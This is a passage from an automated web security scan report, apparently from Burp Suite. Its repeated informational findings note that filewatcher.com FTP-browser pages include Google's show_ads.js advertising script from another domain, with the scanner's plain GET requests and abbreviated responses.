Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/powerpc.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "gXgSmxcrlPEidUBykC+C0Q"
Content-Length: 25367
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 683
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.885. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:16 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fpKPdB3/C3WvW4Ovib5nkg"
Content-Length: 24503
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 680
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.886. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Xxcwuy3GcW12zcg2Ghlcgw"
Content-Length: 21891
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 689
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.887. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nz.debian.org.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "dLHxujfsx7pfMcr8m9uUHw"
Content-Length: 8896
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 632
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/ - FTP Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.888. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nz.debian.org/openbsd.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:08 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "trfsL2l/FauWFI8A0LbCFA"
Content-Length: 8324
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 635
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.889. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.3.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nz.debian.org/openbsd/4.3.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.3.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:08 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Z6LlDcqSE8PR3X5v+/uevA"
Content-Length: 15149
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 639
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.3/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.890. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.3/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nz.debian.org/openbsd/4.3/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.3/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ibao/ZkCEF3AsiHV1IlUZg"
Content-Length: 6570
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 645
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.3/pa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.891. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/amd64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/amd64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/amd64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JKStYYDb1M/OQH0ASesVHQ"
Content-Length: 47479
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 645
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.3/pa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.892. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/powerpc.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/powerpc.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/powerpc.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:10 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "J3Yg3+l5I+QhGMCUedKRFw"
Content-Length: 47874
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 645
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.3/pa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.893. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.4.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nz.debian.org/openbsd/4.4.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.4.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:11 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/S1vg9eYT+Yy7x4qmP7fiQ"
Content-Length: 13949
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 645
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.4/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.894. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.4/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nz.debian.org/openbsd/4.4/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.4/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:12 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "orP/WlhxERLPENIaI2X0uQ"
Content-Length: 6570
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 649
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.4/pa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.895. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.4/packages/amd64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nz.debian.org/openbsd/4.4/packages/amd64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.4/packages/amd64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:12 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "vSIPjQI60JaLWh+tqW/4Ig"
Content-Length: 24284
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 652
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.4/pa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.896. http://www.filewatcher.com/b/ftp/ftp.ps.pl.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.ps.pl.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kbobwGx6J6myymo4CPGYAA"
Content-Length: 6249
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 688
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/ - FTP Browser</title>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.897. http://www.filewatcher.com/b/ftp/ftp.ps.pl/dsk0.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.ps.pl/dsk0.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl/dsk0.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "toIkA4yWlK7H3SCsld4dPw"
Content-Length: 20594
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 691
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/dsk0/ - FTP Browser</t
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.898. http://www.filewatcher.com/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fu1qYVMk+CVZMP5Kr+0s2A"
Content-Length: 8837
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 693
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/dsk0/ftp.openbsd.org/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.899. http://www.filewatcher.com/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "YObL+uA/09wDR2eARYK3nw"
Content-Length: 7412
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 693
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/dsk0/ftp.openbsd.org/s
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.900. http://www.filewatcher.com/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ALIgsFRQ7pAct6sNv7iJiA"
Content-Length: 6431
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 695
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/dsk0/ftp.openbsd.org/s
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.901. http://www.filewatcher.com/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages/i386.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages/i386.0.0.html

